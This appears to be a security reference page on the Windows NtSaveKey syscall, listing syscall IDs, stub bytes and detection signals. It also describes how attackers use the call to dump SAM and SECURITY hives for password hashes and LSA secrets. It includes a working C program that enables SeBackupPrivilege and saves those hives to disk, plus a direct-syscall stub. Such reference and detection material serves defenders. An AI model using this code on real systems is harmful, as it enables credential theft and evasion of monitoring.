ntoskrnl.exeT1003.002T1003.004T1106

NtSaveKey

Writes a live registry key (with subtree) to a hive file — the kernel side of SAM/SECURITY theft.

Prototype

NTSTATUS NtSaveKey(
  HANDLE  KeyHandle,
  HANDLE  FileHandle
);

Arguments

Name	Type	Dir	Description
KeyHandle	HANDLE	in	Open handle to the source key (must have KEY_QUERY_VALUE rights; the entire subtree is captured).
FileHandle	HANDLE	in	Open handle to the destination file (opened with GENERIC_WRITE on an empty/new file).

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x167	win10-1507
Win10 1607	0x16F	win10-1607
Win10 1703	0x175	win10-1703
Win10 1709	0x178	win10-1709
Win10 1803	0x17A	win10-1803
Win10 1809	0x17B	win10-1809
Win10 1903	0x17C	win10-1903
Win10 1909	0x17C	win10-1909
Win10 2004	0x182	win10-2004
Win10 20H2	0x182	win10-20h2
Win10 21H1	0x182	win10-21h1
Win10 21H2	0x184	win10-21h2
Win10 22H2	0x184	win10-22h2
Win11 21H2	0x18C	win11-21h2
Win11 22H2	0x18F	win11-22h2
Win11 23H2	0x18F	win11-23h2
Win11 24H2	0x191	win11-24h2
Server 2016	0x16F	winserver-2016
Server 2019	0x17B	winserver-2019
Server 2022	0x18A	winserver-2022
Server 2025	0x191	winserver-2025

Kernel module

ntoskrnl.exe → NtSaveKey

Related APIs

RegSaveKeyWRegSaveKeyExWNtSaveKeyExNtLoadKeyNtRestoreKey

Syscall stub

4C 8B D1            mov r10, rcx
B8 91 01 00 00      mov eax, 0x191
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

NtSaveKey serialises a live registry key and its full subtree to a hive-format file. The output file is a *first-class hive*: byte-compatible with the on-disk SAM, SYSTEM, SECURITY files. The caller must hold **SeBackupPrivilege**. NtSaveKey is the original; `NtSaveKeyEx` adds a flags parameter (`REG_STANDARD_FORMAT` vs `REG_LATEST_FORMAT`). Win32 wrapper is `RegSaveKeyW` / `RegSaveKeyExW`.

Common malware usage

This is the **canonical no-VSS path for stealing live SAM and SECURITY hives**: open `HKLM\SAM` and `HKLM\SECURITY` (which require SYSTEM-level access or impersonation), then NtSaveKey them to a writable location. The resulting files are then fed through `secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` (Impacket) or Mimikatz `lsadump::sam` to recover NTLM hashes, DPAPI master keys, cached domain credentials, and LSA secrets — *without* needing Volume Shadow Copy creation (which is heavily monitored). Impacket's `reg.py save` command is precisely this primitive exposed over RemoteRegistry/SMB. SeBackupPrivilege itself is the bypass — it overrides DACLs on read, so even keys explicitly denied to the local Administrators group become readable.

Impacket secretsdump.py / reg.py save Mimikatz (lsadump::sam, lsadump::secrets)CrackMapExec / NetExec (sam / lsa modules)QuarksPwDump fgdump / PwDump DSInternals (Get-ADDBAccount on dumped hives)

Detection opportunities

Sysmon Event 11 (FileCreate) on hive-format files outside `%SystemRoot%\System32\config\` is the most reliable signal — combined with Event 13 / 12 on `HKLM\SAM` or `HKLM\SECURITY` opens immediately prior. ETW `Microsoft-Windows-Kernel-Registry` emits explicit save-hive events including both the source key and destination path. SeBackupPrivilege adjustment (Sysmon 4673 with `SeBackupPrivilege` in the privilege list) by a non-backup process is high-signal. Detect `reg.exe save HKLM\SAM` and PowerShell equivalents (`Get-Acl`+native), and watch for any *SYSTEM-process-spawned* file write of a hive-magic (`regf`) header outside config directories.

Direct syscall examples

asmx64 direct stub (Win11 24H2)

; Direct syscall stub for NtSaveKey (SSN 0x191 on Win11 24H2 — drifts per build)
NtSaveKey PROC
    mov  r10, rcx          ; KeyHandle
    mov  eax, 191h         ; SSN
    syscall
    ret
NtSaveKey ENDP

cLive SAM/SECURITY extraction skeleton

// Dump SAM and SECURITY hives without touching Volume Shadow Copy.
// Requires SYSTEM context AND SeBackupPrivilege enabled.
#include <windows.h>

static BOOL EnableBackupPriv(void) {
    HANDLE tok; TOKEN_PRIVILEGES tp = {0};
    if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_ADJUST_PRIVILEGES, &tok)) return FALSE;
    LookupPrivilegeValueW(NULL, SE_BACKUP_NAME, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL)
              && GetLastError() == ERROR_SUCCESS;
    CloseHandle(tok);
    return ok;
}

LONG DumpHive(LPCWSTR root, LPCWSTR outPath) {
    HKEY hKey = NULL;
    LONG s = RegOpenKeyExW(HKEY_LOCAL_MACHINE, root,
                            REG_OPTION_BACKUP_RESTORE, KEY_READ, &hKey);
    if (s != ERROR_SUCCESS) return s;
    DeleteFileW(outPath);
    s = RegSaveKeyExW(hKey, outPath, NULL, REG_LATEST_FORMAT);
    RegCloseKey(hKey);
    return s;
}

int wmain(void) {
    if (!EnableBackupPriv()) return 1;
    DumpHive(L"SAM",      L"C:\\stage\\SAM.hiv");
    DumpHive(L"SECURITY", L"C:\\stage\\SECURITY.hiv");
    DumpHive(L"SYSTEM",   L"C:\\stage\\SYSTEM.hiv");
    return 0;
}

rustDirect NtSaveKey via ntapi

// Cargo: ntapi = "0.4", winapi = { version = "0.3", features = ["winnt", "handleapi"] }
use ntapi::ntregapi::NtSaveKey;
use winapi::shared::ntdef::{HANDLE, NTSTATUS};

unsafe fn save_hive(key: HANDLE, file: HANDLE) -> NTSTATUS {
    // Caller is expected to have already enabled SeBackupPrivilege
    // and opened `key` with KEY_QUERY_VALUE and `file` with GENERIC_WRITE.
    NtSaveKey(key, file)
}

MITRE ATT&CK mappings

Last verified: 2026-05-20